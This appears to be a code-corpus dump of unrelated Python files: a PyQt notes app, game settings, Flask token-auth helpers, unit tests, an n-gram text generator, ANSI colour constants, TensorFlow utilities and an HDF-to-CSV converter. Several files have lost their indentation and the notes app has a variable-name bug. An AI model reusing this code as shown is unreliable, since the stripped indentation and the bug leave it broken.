list_tags = QListWidget()
list_tags_label = QLabel('Список тегов')
#расположение виджетов по лэйаутам
layout_notes = QHBoxLayout()
col_1 = QVBoxLayout()
col_1.addWidget(field_text)
col_2 = QVBoxLayout()
col_2.addWidget(list_notes_label)
col_2.addWidget(list_notes)
row_1 = QHBoxLayout()
row_1.addWidget(button_note_create)
row_1.addWidget(button_note_del)
row_2 = QHBoxLayout()
row_2.addWidget(button_note_save)
col_2.addLayout(row_1)
col_2.addLayout(row_2)
col_2.addWidget(list_tags_label)
col_2.addWidget(list_tags)
col_2.addWidget(field_tag)
row_3 = QHBoxLayout()
row_3.addWidget(button_tag_add)
row_3.addWidget(button_tag_del)
row_4 = QHBoxLayout()
row_4.addWidget(button_tag_search)
col_2.addLayout(row_3)
col_2.addLayout(row_4)
layout_notes.addLayout(col_1, stretch = 2)
layout_notes.addLayout(col_2, stretch = 1)
notes_win.setLayout(layout_notes)
def add_note():
note_name, ok = QInputDialog.getText(notes_win, 'Добавить заметку', 'Название заметки:')
if ok and note_name != '':
notes[notes_name] = {'текст': '', 'теги': []}
list_notes.addItem(note_name)
print(notes)
def show_note():
key = list_notes.selectedItems()[0].text()
print(key)
field_text.setText(notes[key]["текст"])
list_tags.clear()
list_tags.addItems(notes[key]["теги"])
def save_note():
if list_notes.selectedItems():
key = list_notes.selectedItems()[0].text()
notes[key]['текст'] = field_text.toPlainText()
with open ('notes_data.json', 'w') as file:
json.dump(notes, file, sort_keys=True)
print(notes)
else:
print('Заметка для сохранения не выбрана!')
def del_note():
if list_notes.selectedItems():
key = list_notes.selectedItems()[0].text()
del notes[key]
list_notes.clear()
list_tags.clear()
field_text.clear()
list_notes.addItems(notes)
with open('notes_data.json', 'w') as file:
json.dump(notes, file, sort_keys=True)
print(notes)
else:
print('Заметка для удаления не выбрана!')
list_notes.itemClicked.connect(show_note)
button_note_create.clicked.connect(add_note)
button_note_save.clicked.connect(save_note)
button_note_del.clicked.connect(del_note)
notes_win.show()
with open("notes_data.json", "r") as file:
notes = json.load(file)
list_notes.addItems(notes)
app.exec_()
| 2.65625 | 3 |
settings.py | chingandy/intelligent-space-invaders-player | 1 | 12769666 |
class Settings():
"""A class to store all settings for Allien Invation."""
def __init__(self):
"""Initialize the game's static settings"""
# Screen Settings
self.screen_width = 800
self.screen_height = 600
# self.bg_color = (0, 0, 0)
self.bg_color = (10, 10, 10)
# Ship
self.ship_speed_factor = 1.5
self.ship_limit = 3
# bullet
self.bullet_speed_factor = 5
self.bullet_width = 3
self.bullet_height = 15
# self.bullet_color = (252, 248, 8) # 60, 60, 60
self.bullet_color = (255,255,0)
self.bullets_allowed = 3
# Alien
self.alien_speed_factor = 3
self.fleet_drop_speed = 20
self.fleet_direction = 1 # 1: right; -1: left
# How quickly the game speed up
self.speedup_scale = 1.1
# How quickly the alien point values increase
self.score_scale = 1.5
self.initialize_dynamic_settings()
def initialize_dynamic_settings(self):
"""Initialize settings that change throughout the game."""
self.ship_speed_factor = 10 # original: 1.5
self.bullet_speed_factor = 3
self.alien_speed_factor = 1
# fleet direction of 1 represents right; -1 represents left.
self.fleet_direction = 1
# scoring
self.alien_points = 50
def increase_speed(self):
"""Increase speed settings and alien point values."""
self.ship_speed_factor *= self.speedup_scale
self.bullet_speed_factor *= self.speedup_scale
self.alien_speed_factor *= self.speedup_scale * 1.3
self.alien_points = int(self.alien_points * self.score_scale)
| 3.421875 | 3 |
acondbs/auth/__init__.py | simonsobs/acondbs | 0 | 12769667 | <reponame>simonsobs/acondbs
from flask import request
from ..models import (
GitHubToken,
GitHubUser,
AccountAdmin
)
##__________________________________________________________________||
def is_signed_in():
"""
"""
token = _get_token_from_http_headers()
if not token:
return False
token_model = GitHubToken.query.filter_by(token=token).one_or_none()
if not token_model:
return False
return True
##__________________________________________________________________||
def is_admin():
"""
"""
if not is_signed_in():
return False
token = _get_token_from_http_headers()
if not token:
return False
user_model = GitHubUser.query.join(GitHubToken). \
filter(GitHubToken.token==token). \
one_or_none()
if not user_model:
return False
admin_model = AccountAdmin.query. \
filter_by(git_hub_login=user_model.login). \
one_or_none()
if not admin_model:
return False
return True
##__________________________________________________________________||
def _get_token_from_http_headers():
auth_header = request.headers.get('Authorization')
# e.g., 'Bearer "xxxx"', "Bearer 'xxxx'", or 'Bearer xxxx'
if not auth_header:
return None
token = auth_header.split()[1].strip('"\'')
# e.g., "xxxx"
return token
##__________________________________________________________________||
| 2.375 | 2 |
tests/unit/service/test_business_super_man.py | thiagortz/justice-league | 2 | 12769668 | from unittest import TestCase
from unittest.mock import patch
from app.service.business_service import SuperMan
class TestSuperMan(TestCase):
@classmethod
def setUpClass(cls):
pass
@classmethod
def tearDownClass(cls):
pass
def setUp(self):
pass
def tearDown(self):
pass
@patch("app.service.business_service.SuperMan._request_get", return_value="response")
def test_request_get(self, mock_request_get):
super_man = SuperMan(CPF='10387595612')
actual = super_man.to_call()
mock_request_get.assert_called_once_with(resource='5af099f2310000610096c6ee', params={'CPF': '10387595612'})
self.assertEqual(actual, 'response')
| 2.875 | 3 |
talker.py | Allahcadrimbo/RandomTalker | 0 | 12769669 | <gh_stars>0
"""
Author: <NAME>
Date: 10/4/19
PA #2 NLP
In this PA we are attempting to create a random text generator. The program (talker) will learn an N-gram language model
from an arbitrary number of plain text files, and then use the generated model to generate the random sentences. An
N-gram is a probabilistic language model that is trying to predict the next item (in this case a word) based on n
previous words. Talker should be able to work for n values of 1, 2, and 3 (unigrams, bigrams, and trigrams). Talker
should be able to output a user specified number of sentences. Talker should also be able to take any number of text
files passed in by the user. We want talker to get all of this information from command line arguments. No matter the
number of text files we will treat them as a single corpus and learn one n-gram model. Furthermore, talker needs to be
able to identify sentence boundaries in this case we will assume !,., and ? are the only boundaries. The Ngrams should
not cross the sentence boundaries.
Talker is ran by running a command with the following syntax: python3 talker.py n m text_file(s)
where n is the ngram integer, m is the number of sentences to be outputted, and text_file(s) is one or more text files
in the current directory that will be used to create the ngram model.
Here is an example input and it's corresponding output:
input: python3 talker.py 2 10 theraven.txt caskofamontillado.txt fallofthehouseofusher.txt clarissa1.txt clarissa2.txt
output:
This program generates random sentences based on an Ngram model. CS 4242 by <NAME>.
Command line settings : talker 2 10
1. heard i was now, belford thing before you making herself an, there need letter from clarissa, who, he should pursue
when you advise though by surprise be made >>> sight, all so dearly loved giddy fellows.
2. by day?
3. a chairman : a poor hand say, if that i could ]: and i only his displeasure of mr.
4. the good-for-little magnates horns.
5. and it might in what relates of your goodness, or for to have her proposed, set wretch, as, that i what i have write.
6. then accounts, that period, .
7. with such a out of regard a thousand witnesses longing to hear to raise his never will!
8. pinion over fabric that i may comfort!
9. never was there in the dining-room begs he will six words--a religious.
10. your third article but nevertheless, the person ; , all of, which conceals that it had that at hampstead did i owe
and young tumbled of your fine i, (urging shall at least to be proud pausing--and rising from.
Algorithm:
- Grab all of the command line variables and assign them to variables
- Process all of the passed in text files
- Make all of the text lower case
- Put a space between all numeric, alphabetic chars, and punctuation so they are all counted as distinct tokens
- Add each text processed text file to a single corpus so it can be used as if it was one file
- Take the processed corpus and turn it into a list of tokens by splitting on whitespace
- Check to makes sure there is at least 1,000,000 tokens
- Create the Ngram model base off of the list of tokens
- For each token grab it and the next n token and add them to a sublist of the ngram_model list
- Do this for all tokens excepts the last n in the list
- Process the Ngram model
- Turn all of the elements in each sublist into one element by joining them with a space in between
- Generate the random sentences based off of the ngram model
- Randomly pick a sublist from ngram model and append them into a sentence until you encounter a sentence boundary
- Process the sentence
- Remove the space between a punctuation mark and the alphanumeric preceding it
- Remove any portion of an incomplete sentence at the end of the sentence
- Print the sentence
"""
import re
import sys
import random
# This method takes in all of the plain text files and does some initial processing to it
def process_text(file_name):
# We open the text file and refer to is as "file"
with open(file_name, "r", encoding="utf8") as file:
text = file.read() # Reads the files into a String text
text = text.lower() # Will make every line lowercase in the file
# A space is put between a alphanumeric followed by punctuation. We do this to make them distinct tokens
text = re.sub(r'([a-zA-Z0-9])([,.!\[\]%{}?#&*@":;])', r'\1 \2', text)
# A space is put between a punctuation followed by an alphanumeric. We do this to make them distinct tokens
text = re.sub(r'([,.!\[\]%{}#&*@":;])([a-zA-Z0-9])', r'\1 \2', text)
# A space is put between a numeric followed by a letter. Which will make both distinct tokens
text = re.sub(r'([0-9])([a-zA-Z])', r'\1 \2', text)
# A space is put between a letter followed by a numeric. Which will make both distinct tokens
text = re.sub(r'([a-zA-Z])([0-9])', r'\1 \2', text)
return text # return the processed text
# Creates a ngram model dictated by the integer passed in as n and trains the model on the list of token passed in
def create_ngram_model(n, tokens):
ngram_result = [] # New list to hold the ngram
# For every token in the list we will grab the token plus the next n tokens and then append that gram to the model
# We can grab the next n tokens because it is essentially the same thing as grabbing the previous n tokens. They
# both will yield the same result. We stop at len(tokens)-n because anything past that won't have n tokens ahead of
# it.
for j in range(len(tokens)-n):
ngram_result.append(tokens[j:j+n+1])
return ngram_result
# This function processes the model that was just created. The model will be a list of lists that looks something like
# [["x", "y", "z"],...] but we want it to look like [["x y z"],...] so this method does that for us.
def process_model(model):
processed_model = [] # New list to hold the processed gram
# For every sublist in the list model we will join each element with a space in between
for gram in model:
processed_model.append(' '.join(gram))
return processed_model
# This method will take the # of sentences to generate and a model to generate off of.
def generate_random_sentences(number_of_sentences, model):
# Do this for as many sentences are required by number_of_sentences
for y in range(number_of_sentences):
sentence = ""
# This while loop will randomly grab a sublist from the list model until a sentence boundary is encountered
while not re.search(r'[!.?]', sentence):
sentence += " " + model[random.randint(0, len(model)-1)]
# We print the finished sentence with a numerical value stating which sentence it is after some processing on
# the sentence
print(str(y+1) + ". " + process_random_sentences(sentence))
# Used to process the random sentence to make it look a little bit more like a real sentence
def process_random_sentences(sentence):
# This regex will find all punctuation following an alphanumeric and remove the space in between them
# Example my cat . -> my cat.
sentence = re.sub(r'([a-z0-9]+) ([,.!?])', r'\1\2', sentence)
# These will be used as the starting index of the possible sentence boundaries
period = 0
exclamation = 0
question = 0
# For each sentence boundary if it is present in the sentence we get the index of it's last occurrence
if '.' in sentence:
period = sentence.rindex('.')
if '!' in sentence:
exclamation = sentence.rindex('!')
if '?' in sentence:
question = sentence.rindex('?')
# Out of all of the sentence boundaries which ever one has the very last occurrence we take the substring of the
# sentence all they way to that index+1. We do this so that if the last gram is "a b c. x y" we don't have an
# incomplete sentence at the end. So it would turn into "a b c."
if period > (exclamation and question):
sentence = sentence[:period+1]
elif exclamation > (question and period):
sentence = sentence[:exclamation+1]
elif question > (exclamation and period):
sentence = sentence[:question+1]
return sentence
if __name__ == "__main__":
arg_len = len(sys.argv) # Get the number of command line arguments
ngram = int(sys.argv[1]) # An integer that represents the n gram number
m = int(sys.argv[2]) # An integer that is the number of random sentences to be generated
corpus = "" # Our corpus that we will create the ngram model with
print("This program generates random sentences based on an Ngram model. CS 4242 by <NAME>."
"\nCommand line settings : talker " + str(ngram) + " " + str(m) + "\n")
# Iterate through all of the file names passed through and process them and then append them to the corpus
for i in range(3, arg_len):
# Adds the processed text file to the pre-existing corpus. A space is added
# to ensure the last token of the existing corpus is separate from the first toke of the appended text
corpus += " " + process_text(sys.argv[i])
# Take our finished corpus and turns it into a list of tokens. This will split on whitespace.
token_list = corpus.split()
# A check to make sure the corpus is at least a million tokens
if len(token_list) < 1000000:
print("The corpus is less than a million tokens!\n")
# Create our ngram model and do a little bit of processing to it first
ngram_model = process_model(create_ngram_model(ngram, token_list))
# Using our ngram model and the number of sentences we will generate m number of random sentences
generate_random_sentences(m, ngram_model)
| 3.234375 | 3 |
renkler.py | 0xberkay/renkler | 1 | 12769670 | #<NAME>
#<EMAIL>
#github.com/bksec
#####################################
###############RENKLER###############
#####################################
sifirla = '\033[0m'
beyaz = '\033[37m'
kirmizi= '\033[31m'
turuncu = '\u001b[38;5;208m'
yesil= '\033[32m'
sari= '\033[33m'
lacivert= '\033[34m'
pembe= '\033[35m'
mor = '\u001b[38;5;165m'
mavi= '\u001b[38;5;32m'
siyah = '\033[90m'
kahverengi = '\u001b[38;5;95m'
aciksari = '\u001b[38;5;228m'
gri = '\u001b[38;5;246m'
turkuaz = '\u001b[38;5;45m'
pmavi = '\033[96m'#p --> parlak
pkirmizi= '\033[91m'
pyesil = '\033[92m'
psari = '\033[93m'
asiyah= '\033[40m'#a --> arkaplan
akirmizi= '\033[41m'
ayesil= '\033[42m'
asari= '\033[43m'
alacivert= '\033[44m'
amor= '\033[45m'
amavi= '\033[46m'
abeyaz= '\033[47m'
apsiyah= '\033[100m'#a --> arkaplan-parlak
apkirmizi= '\033[101m'
apyesil= '\033[102m'
apsari= '\033[103m'
aplacivert= '\033[104m'
apmor= '\033[105m'
apmavi= '\033[106m'
apbeyaz= '\033[107m'
apsifirla= '\033[0;49m'
#yazi sekilleri
kalin = '\033[1m'
altcizgi = '\033[4m'
parlak = '\033[5m'
tum_renkler=("\033[0msifirla","\033[37mbeyaz","\033[31mkirmizi","\u001b[38;5;208mturuncu","\033[32myesil","\033[33msari","\033[34mlacivert","\033[35mpembe","\u001b[38;5;165mmor","\u001b[38;5;32mmavi","\033[90msiyah","\u001b[38;5;228maciksari","\u001b[38;5;246mgri","\u001b[38;5;95mkahverengi","\033[96mpmavi","\033[91mpkirmizi","\033[92mpyesil","\033[93mpsari\033[0m","\033[40masiyah","\033[41makirmizi","\033[42mayesil","\033[43masari","\033[44malacivert","\033[45mamor","\033[46mamavi","\033[47mabeyaz","\033[101mapkirmizi","\033[102mapyesil","\033[103mapsari","\033[104maplacivert","\033[105mapmor","\033[106mapmavi","\033[107mapbeyaz","\033[0;49mapsifirla","\033[1mkalin","\033[4maltcizgi\033[0m","\033[5mparlak")
def rastgeleRenkler(*rastgele):
import random
rastgeleliste = list(rastgele)
rastgeleRenk = random.choice(rastgeleliste)
return rastgeleRenk
| 1.226563 | 1 |
nlp/nn.py | hanxiao/tf-attentive-conv | 34 | 12769671 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# <NAME> <<EMAIL>> <https://hanxiao.github.io>
import tensorflow as tf
initializer = tf.contrib.layers.variance_scaling_initializer(factor=1.0,
mode='FAN_AVG',
uniform=True,
dtype=tf.float32)
initializer_relu = tf.contrib.layers.variance_scaling_initializer(factor=2.0,
mode='FAN_IN',
uniform=False,
dtype=tf.float32)
regularizer = tf.contrib.layers.l2_regularizer(scale=3e-7)
def minus_mask(x, mask, offset=1e30):
"""
masking by subtract a very large number
:param x: sequence data in the shape of [B, L, D]
:param mask: 0-1 mask in the shape of [B, L]
:param offset: very large negative number
:return: masked x
"""
return x - tf.expand_dims(1.0 - mask, axis=-1) * offset
def mul_mask(x, mask):
"""
masking by multiply zero
:param x: sequence data in the shape of [B, L, D]
:param mask: 0-1 mask in the shape of [B, L]
:return: masked x
"""
return x * tf.expand_dims(mask, axis=-1)
def masked_reduce_mean(x, mask):
return tf.reduce_sum(mul_mask(x, mask), axis=1) / tf.reduce_sum(mask, axis=1, keepdims=True)
def masked_reduce_max(x, mask):
return tf.reduce_max(minus_mask(x, mask), axis=1)
def weighted_sparse_softmax_cross_entropy(labels, preds, weights):
"""
computing sparse softmax cross entropy by weighting differently on classes
:param labels: sparse label in the shape of [B], size of label is L
:param preds: logit in the shape of [B, L]
:param weights: weight in the shape of [L]
:return: weighted sparse softmax cross entropy in the shape of [B]
"""
return tf.losses.sparse_softmax_cross_entropy(labels,
logits=preds,
weights=get_bounded_class_weight(labels, weights))
def get_bounded_class_weight(labels, weights, ub=None):
if weights is None:
return 1.0
else:
w = tf.gather(weights, labels)
w = w / tf.reduce_min(w)
w = tf.clip_by_value(1.0 + tf.log1p(w),
clip_value_min=1.0,
clip_value_max=ub if ub is not None else tf.cast(tf.shape(weights)[0], tf.float32) / 2.0)
return w
def weighted_smooth_softmax_cross_entropy(labels, num_labels, preds, weights,
epsilon=0.1):
"""
computing smoothed softmax cross entropy by weighting differently on classes
:param epsilon: smoothing factor
:param num_labels: maximum number of labels
:param labels: sparse label in the shape of [B], size of label is L
:param preds: logit in the shape of [B, L]
:param weights: weight in the shape of [L]
:return: weighted sparse softmax cross entropy in the shape of [B]
"""
return tf.losses.softmax_cross_entropy(tf.one_hot(labels, num_labels),
logits=preds,
label_smoothing=epsilon,
weights=get_bounded_class_weight(labels, weights))
def get_var(name, shape, dtype=tf.float32,
initializer_fn=initializer,
regularizer_fn=regularizer, **kwargs):
return tf.get_variable(name, shape,
initializer=initializer_fn,
dtype=dtype,
regularizer=regularizer_fn, **kwargs)
def layer_norm(inputs,
epsilon=1e-8,
scope=None,
reuse=None):
"""Applies layer normalization.
Args:
inputs: A tensor with 2 or more dimensions, where the first dimension has
`batch_size`.
epsilon: A floating number. A very small number for preventing ZeroDivision Error.
scope: Optional scope for `variable_scope`.
reuse: Boolean, whether to reuse the weights of a previous layer
by the same name.
Returns:
A tensor with the same shape and data dtype as `inputs`.
"""
with tf.variable_scope(scope or 'Layer_Normalize', reuse=reuse):
inputs_shape = inputs.get_shape()
params_shape = inputs_shape[-1:]
mean, variance = tf.nn.moments(inputs, [-1], keep_dims=True)
beta = tf.Variable(tf.zeros(params_shape))
gamma = tf.Variable(tf.ones(params_shape))
normalized = (inputs - mean) / ((variance + epsilon) ** .5)
outputs = gamma * normalized + beta
return outputs
def linear_logit(x, units, act_fn=None, dropout_keep=1., use_layer_norm=False, scope=None, **kwargs):
with tf.variable_scope(scope or 'linear_logit'):
logit = tf.layers.dense(x, units=units, activation=act_fn,
kernel_initializer=initializer,
kernel_regularizer=regularizer)
# do dropout
logit = tf.nn.dropout(logit, keep_prob=dropout_keep)
if use_layer_norm:
logit = tf.contrib.layers.layer_norm(logit)
return logit
def bilinear_logit(x, units, act_fn=None,
first_units=256,
first_act_fn=tf.nn.relu, scope=None, **kwargs):
with tf.variable_scope(scope or 'bilinear_logit'):
first = linear_logit(x, first_units, act_fn=first_act_fn, scope='first', **kwargs)
return linear_logit(first, units, scope='second', act_fn=act_fn, **kwargs)
def label_smoothing(inputs, epsilon=0.1):
"""Applies label smoothing. See https://arxiv.org/abs/1512.00567.
Args:
inputs: A 3d tensor with shape of [N, T, V], where V is the number of vocabulary.
epsilon: Smoothing rate.
For example,
```
import tensorflow as tf
inputs = tf.convert_to_tensor([[[0, 0, 1],
[0, 1, 0],
[1, 0, 0]],
[[1, 0, 0],
[1, 0, 0],
[0, 1, 0]]], tf.float32)
outputs = label_smoothing(inputs)
with tf.Session() as sess:
print(sess.run([outputs]))
>>
[array([[[ 0.03333334, 0.03333334, 0.93333334],
[ 0.03333334, 0.93333334, 0.03333334],
[ 0.93333334, 0.03333334, 0.03333334]],
[[ 0.93333334, 0.03333334, 0.03333334],
[ 0.93333334, 0.03333334, 0.03333334],
[ 0.03333334, 0.93333334, 0.03333334]]], dtype=float32)]
```
"""
K = inputs.get_shape().as_list()[-1] # number of channels
return ((1 - epsilon) * inputs) + (epsilon / K)
def normalize_by_axis(x, axis, smooth_factor=1e-5):
x += smooth_factor
return x / tf.reduce_sum(x, axis, keepdims=True) # num A x num B
def get_cross_correlated_mat(num_out_A, num_out_B, learn_cooc='FIXED', cooc_AB=None, scope=None, reuse=None):
with tf.variable_scope(scope or 'CrossCorrlated_Mat', reuse=reuse):
if learn_cooc == 'FIXED' and cooc_AB is not None:
pB_given_A = normalize_by_axis(cooc_AB, 1)
pA_given_B = normalize_by_axis(cooc_AB, 0)
elif learn_cooc == 'JOINT':
share_cooc = tf.nn.relu(get_var('cooc_ab', shape=[num_out_A, num_out_B]))
pB_given_A = normalize_by_axis(share_cooc, 1)
pA_given_B = normalize_by_axis(share_cooc, 0)
elif learn_cooc == 'DISJOINT':
cooc1 = tf.nn.relu(get_var('pb_given_a', shape=[num_out_A, num_out_B]))
cooc2 = tf.nn.relu(get_var('pa_given_b', shape=[num_out_A, num_out_B]))
pB_given_A = normalize_by_axis(cooc1, 1)
pA_given_B = normalize_by_axis(cooc2, 0)
else:
raise NotImplementedError
return pA_given_B, pB_given_A
def get_self_correlated_mat(num_out_A, scope=None, reuse=None):
with tf.variable_scope(scope or 'Self_Correlated_mat', reuse=reuse):
cooc1 = get_var('pa_corr', shape=[num_out_A, num_out_A],
initializer_fn=tf.contrib.layers.variance_scaling_initializer(factor=0.1,
mode='FAN_AVG',
uniform=True,
dtype=tf.float32),
regularizer_fn=tf.contrib.layers.l2_regularizer(scale=3e-4))
return tf.matmul(cooc1, cooc1, transpose_b=True) + tf.eye(num_out_A)
def gate_filter(x, scope=None, reuse=None):
with tf.variable_scope(scope or 'Gate', reuse=reuse):
threshold = get_var('threshold', shape=[])
gate = tf.cast(tf.greater(x, threshold), tf.float32)
return x * gate
from tensorflow.python.ops import array_ops
def focal_loss(prediction_tensor, target_tensor, weights=None, alpha=0.25, gamma=2):
r"""Compute focal loss for predictions.
Multi-labels Focal loss formula:
FL = -alpha * (z-p)^gamma * log(p) -(1-alpha) * p^gamma * log(1-p)
,which alpha = 0.25, gamma = 2, p = sigmoid(x), z = target_tensor.
Args:
prediction_tensor: A float tensor of shape [batch_size, num_anchors,
num_classes] representing the predicted logits for each class
target_tensor: A float tensor of shape [batch_size, num_anchors,
num_classes] representing one-hot encoded classification targets
weights: A float tensor of shape [batch_size, num_anchors]
alpha: A scalar tensor for focal loss alpha hyper-parameter
gamma: A scalar tensor for focal loss gamma hyper-parameter
Returns:
loss: A (scalar) tensor representing the value of the loss function
"""
sigmoid_p = tf.nn.sigmoid(prediction_tensor)
zeros = array_ops.zeros_like(sigmoid_p, dtype=sigmoid_p.dtype)
# For poitive prediction, only need consider front part loss, back part is 0;
# target_tensor > zeros <=> z=1, so poitive coefficient = z - p.
pos_p_sub = array_ops.where(target_tensor > zeros, target_tensor - sigmoid_p, zeros)
# For negative prediction, only need consider back part loss, front part is 0;
# target_tensor > zeros <=> z=1, so negative coefficient = 0.
neg_p_sub = array_ops.where(target_tensor > zeros, zeros, sigmoid_p)
per_entry_cross_ent = - alpha * (pos_p_sub ** gamma) * tf.log(tf.clip_by_value(sigmoid_p, 1e-8, 1.0)) \
- (1 - alpha) * (neg_p_sub ** gamma) * tf.log(tf.clip_by_value(1.0 - sigmoid_p, 1e-8, 1.0))
return tf.reduce_sum(per_entry_cross_ent)
def spatial_dropout(x, scope=None, reuse=None):
input_dim = x.get_shape().as_list()[-1]
with tf.variable_scope(scope or 'spatial_dropout', reuse=reuse):
d = tf.random_uniform(shape=[1], minval=0, maxval=input_dim, dtype=tf.int32)
f = tf.one_hot(d, on_value=0., off_value=1., depth=input_dim)
g = x * f # do dropout
g *= (1. + 1. / input_dim) # do rescale
return g
def get_last_output(output, seq_length, scope=None, reuse=None):
"""Get the last value of the returned output of an RNN.
http://disq.us/p/1gjkgdr
output: [batch x number of steps x ... ] Output of the dynamic lstm.
sequence_length: [batch] Length of each of the sequence.
"""
with tf.variable_scope(scope or 'gather_nd', reuse=reuse):
rng = tf.range(0, tf.shape(seq_length)[0])
indexes = tf.stack([rng, seq_length - 1], 1)
return tf.gather_nd(output, indexes)
def get_lstm_init_state(batch_size, num_layers, num_units, direction, scope=None, reuse=None, **kwargs):
with tf.variable_scope(scope or 'lstm_init_state', reuse=reuse):
num_dir = 2 if direction.startswith('bi') else 1
c = get_var('lstm_init_c', shape=[num_layers * num_dir, num_units])
c = tf.tile(tf.expand_dims(c, axis=1), [1, batch_size, 1])
h = get_var('lstm_init_h', shape=[num_layers * num_dir, num_units])
h = tf.tile(tf.expand_dims(h, axis=1), [1, batch_size, 1])
return c, h
def dropout_res_layernorm(x, fx, act_fn=tf.nn.relu,
dropout_keep_rate=1.0,
residual=False,
normalize_output=False,
scope='rnd_block',
reuse=None, **kwargs):
with tf.variable_scope(scope, reuse=reuse):
input_dim = x.get_shape().as_list()[-1]
output_dim = fx.get_shape().as_list()[-1]
# do dropout
fx = tf.nn.dropout(fx, keep_prob=dropout_keep_rate)
if residual and input_dim != output_dim:
res_x = tf.layers.conv1d(x,
filters=output_dim,
kernel_size=1,
activation=None,
name='res_1x1conv')
else:
res_x = x
if residual and act_fn is None:
output = fx + res_x
elif residual and act_fn is not None:
output = act_fn(fx + res_x)
else:
output = fx
if normalize_output:
output = layer_norm(output)
return output
| 2.625 | 3 |
tacker/tests/unit/vnfm/policy_actions/respawn/test_respawn.py | takahashi-tsc/tacker | 116 | 12769672 | <reponame>takahashi-tsc/tacker
# Copyright (c) 2014-2018 China Mobile (SuZhou) Software Technology Co.,Ltd.
# All Rights Reserved
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import testtools
from unittest import mock
from tacker.common import clients
from tacker import context
from tacker.db.common_services import common_services_db_plugin
from tacker.plugins.common import constants
from tacker.vnfm.infra_drivers.openstack import heat_client as hc
from tacker.vnfm.policy_actions.respawn import respawn as \
policy_actions_respawn
from tacker.vnfm import vim_client
class VNFActionRespawn(testtools.TestCase):
def setUp(self):
super(VNFActionRespawn, self).setUp()
self.context = context.get_admin_context()
mock.patch('tacker.db.common_services.common_services_db_plugin.'
'CommonServicesPluginDb.create_event'
).start()
self._cos_db_plugin =\
common_services_db_plugin.CommonServicesPluginDb()
@mock.patch.object(clients.OpenstackClients, 'heat')
@mock.patch.object(hc.HeatClient, 'delete')
@mock.patch.object(vim_client.VimClient, 'get_vim')
def test_execute_action(self, mock_get_vim, mock_hc_delete, mock_heat):
action_respawn = policy_actions_respawn.VNFActionRespawn()
vnf_dict = {
'id': 'fake-id',
'status': 'fake-status',
'attributes': {
'monitoring_policy': 'fake-monitoring-policy',
'failure_count': '1',
'dead_instance_id_1': '00000000-0000-0000-0000-00000000001'},
'vim_id': 'fake-vim-id',
'vim_auth': 'fake-vim-auth',
'instance_id': '00000000-0000-0000-0000-000000000002',
'placement_attr': {
'region_name': 'fake-region-name'}}
mock_get_vim.return_value = {'vim_auth': {
'auth_url': 'http://fake-url/identity/v3'
}}
mock_hc_delete.return_value = True
plugin = mock.Mock()
plugin._mark_vnf_dead.return_value = True
plugin.create_vnf_sync.return_value = {'id': 'fake-id'}
plugin._vnf_monitor = mock.Mock()
action_respawn.execute_action(plugin, self.context, vnf_dict, None)
self._cos_db_plugin.create_event.assert_called_once_with(
self.context, res_id=vnf_dict['id'],
res_state=vnf_dict['status'],
res_type=constants.RES_TYPE_VNF,
evt_type=constants.RES_EVT_MONITOR,
tstamp=mock.ANY, details="ActionRespawnHeat invoked")
mock_get_vim.assert_called_once_with(self.context, vnf_dict['vim_id'])
plugin.create_vnf_sync.assert_called_with(self.context, vnf_dict)
plugin._vnf_monitor.mark_dead.assert_called_once_with(vnf_dict['id'])
| 1.5 | 2 |
tests/unit_tests/dagmc/test.py | ornlneutronimaging/openmc | 0 | 12769673 | import shutil
import numpy as np
import pytest
import openmc
import openmc.capi
from tests import cdtemp
pytestmark = pytest.mark.skipif(
not openmc.capi._dagmc_enabled(),
reason="DAGMC CAD geometry is not enabled.")
@pytest.fixture(scope="module", autouse=True)
def dagmc_model(request):
model = openmc.model.Model()
# settings
model.settings.batches = 5
model.settings.inactive = 0
model.settings.particles = 100
model.settings.temperature = {'tolerance': 50.0}
model.settings.verbosity = 1
source_box = openmc.stats.Box([ -4, -4, -4 ],
[ 4, 4, 4 ])
source = openmc.Source(space=source_box)
model.settings.source = source
model.settings.dagmc = True
# tally
tally = openmc.Tally()
tally.scores = ['total']
tally.filters = [openmc.CellFilter(1)]
model.tallies = [tally]
# materials
u235 = openmc.Material(name="fuel")
u235.add_nuclide('U235', 1.0, 'ao')
u235.set_density('g/cc', 11)
u235.id = 40
u235.temperature = 320
water = openmc.Material(name="water")
water.add_nuclide('H1', 2.0, 'ao')
water.add_nuclide('O16', 1.0, 'ao')
water.set_density('g/cc', 1.0)
water.add_s_alpha_beta('c_H_in_H2O')
water.id = 41
mats = openmc.Materials([u235, water])
model.materials = mats
# location of dagmc file in test directory
dagmc_file = request.fspath.dirpath() + "/dagmc.h5m"
# move to a temporary directory
with cdtemp():
shutil.copyfile(dagmc_file, "./dagmc.h5m")
model.export_to_xml()
openmc.capi.init()
yield
openmc.capi.finalize()
@pytest.mark.parametrize("cell_id,exp_temp", ((1, 320.0), # assigned by material
(2, 300.0), # assigned in dagmc file
(3, 293.6))) # assigned by default
def test_dagmc_temperatures(cell_id, exp_temp):
cell = openmc.capi.cells[cell_id]
assert np.isclose(cell.get_temperature(), exp_temp)
| 2.03125 | 2 |
planet4/hdf2csv.py | CitizenScienceInAstronomyWorkshop/P4_sandbox | 1 | 12769674 | """This script requires to launch a local ipcontroller. If you execute this
locally, do it with `ipcluster start`.
"""
import argparse
import glob
import logging
import os
import sys
import time
from ipyparallel import Client
from ipyparallel.util import interactive
logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO)
@interactive
def process_fname(fname):
import pandas as pd
newfname = fname[:-3] + 'csv'
pd.read_hdf(fname, 'df').to_csv(newfname)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('directory',
help="Provide the directory of the HDF files "
"that shall be converted to csv here.")
args = parser.parse_args()
root = os.path.abspath(args.directory)
fnames = glob.glob(os.path.join(root, '*.hdf'))
logging.info('Found %i files to convert.', len(fnames))
c = Client()
lbview = c.load_balanced_view()
results = lbview.map_async(process_fname, fnames)
# progress display
while not results.ready():
print("{:.1f} %".format(100 * results.progress / len(fnames)))
sys.stdout.flush()
time.sleep(10)
logging.info('Conversion done.')
| 2.453125 | 2 |
EasyLaMa/utils/cli.py | kanttouchthis/EasyLaMa | 1 | 12769675 | import argparse
from EasyLaMa import TextRemover
